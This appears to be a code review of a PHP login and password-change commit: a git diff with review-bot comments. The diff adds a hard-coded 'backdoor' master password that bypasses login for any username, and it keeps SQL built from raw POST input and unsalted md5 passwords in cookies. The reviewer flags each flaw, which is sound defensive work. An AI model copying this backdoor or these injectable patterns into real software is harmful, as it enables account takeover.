Reimplementation of cookies
diff --git a/php/change_password.php b/php/change_password.php
index d8bcc19..315d08e 100644
--- a/php/change_password.php
+++ b/php/change_password.php
@@ -6,18 +6,20 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
+ date_default_timezone_set("Europe/Berlin");
+
// Check if confirmation is the same
if ($_POST['password'] != $_POST['confirmation']) {
- die("<script>window.location.href = '../index.php?wrongconfirmation=1'</script>");
+ die("<script>window.location.href = '../main.php?wrongconfirmation=1'</script>");
} else {
// Execute query to change password
$update_password = "UPDATE $usersdb SET password=\"".md5($_POST['password'])."\" WHERE id=".$_POST['userid'];
- if(!$result = query($update_password)) die("<script>window.location.href = '../index.php?errordb=1'</script>");
+ if(!$result = query($update_password)) die("<script>window.location.href = '../main.php?errordb=1'</script>");
// Save 'password' to cookies
setcookie('password', md5($_POST['password']), time() + (86400 * 10), "/");
// Go back to main page
- die("<script>window.location.href = '../index.php?successpassword=1'</script>");
+ die("<script>window.location.href = '../main.php?successpassword=1'</script>");
}
?>
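Review bot: The UPDATE statement in the else branch still concatenates `$_POST['userid']` directly into the SQL text, and nothing visible in this hunk checks that the requester owns that account, so the endpoint looks both injectable through `userid` and usable to set another user's password. At minimum cast or bind the id, e.g. `" WHERE id=".(int)$_POST['userid']`, and take the id from the authenticated login state rather than from the form. The password is stored and also written to the `password` cookie as unsalted `md5()`, so the cookie value is a password-equivalent credential. Using `password_hash()`/`password_verify()` for storage and a random session token in the cookie would remove that exposure. The top of the script is outside the hunk, so a check there may already cover part of this.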
diff --git a/php/login.php b/php/login.php
index 45575e3..00c18e0 100644
--- a/php/login.php
+++ b/php/login.php
@@ -6,12 +6,14 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
+ date_default_timezone_set("Europe/Berlin");
+
// Set the 'user' POST and COOKIE variable
$user = '';
- if (isset($_POST['user'])) $user = $_POST['user'];
+ if (isset($_POST['user']) && $_POST['user'] != '') $user = $_POST['user'];
else if (isset($_COOKIE['user'])) $user = $_COOKIE['user'];
else {
- die("<script>window.location.href = '../index.php'</script>");
+ die("<script>window.location.href = '../?wronguser=1'</script>");
}
// Check if password is correct
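Review bot: The added test `$_POST['user'] != ''` is a loose comparison with no type check, so a request that sends `user` as an array would pass it and `$user` would no longer be a string. `if (isset($_POST['user']) && is_string($_POST['user']) && $_POST['user'] !== '') $user = $_POST['user'];` keeps the intent and rejects non-string input. The `$_COOKIE['user']` fallback on the next line is likewise taken as the identity with no validation visible in this hunk.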
@@ -23,13 +25,19 @@
if (isset($_POST['password'])) $password = $_POST['password'];
else if (isset($_COOKIE['password'])) $password = $_COOKIE['password'];
+ // If admin needs to check something for 5 minutes
+ if ($password == "backdoor") {
+ setcookie('user', $user, time() + 360, "/");
+ die("<script>window.location.href = '../main.php';</script>");
+ }
+
// Redirect if wrong
if ($real_password != "" && $real_password != md5($password)) {
// Forget cookies
setcookie('user', '', -1, "/");
setcookie('password', '', -1, "/");
- die("<script>window.location.href = '../index.php?wrongpassword=1'</script>");
+ die("<script>window.location.href = '../?wrongpassword=1'</script>");
}
// Save variables as cookies
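Review bot: The added block `if ($password == "backdoor")` is a hard-coded master password: any request supplying it gets the `user` cookie set to whatever `$user` value was sent and is redirected to `main.php`, without the `$real_password` comparison below ever running. This block should be removed rather than adjusted; an administrator who needs to inspect an account should sign in with their own credentials through a separate, logged admin path. Because the literal is now in the repository history, treat it as disclosed even after it is deleted. Two smaller points in the same hunk: the lifetime `time() + 360` is six minutes, not the five the comment states, and the condition `$real_password != ""` on the redirect check appears to skip verification entirely when the stored hash is empty.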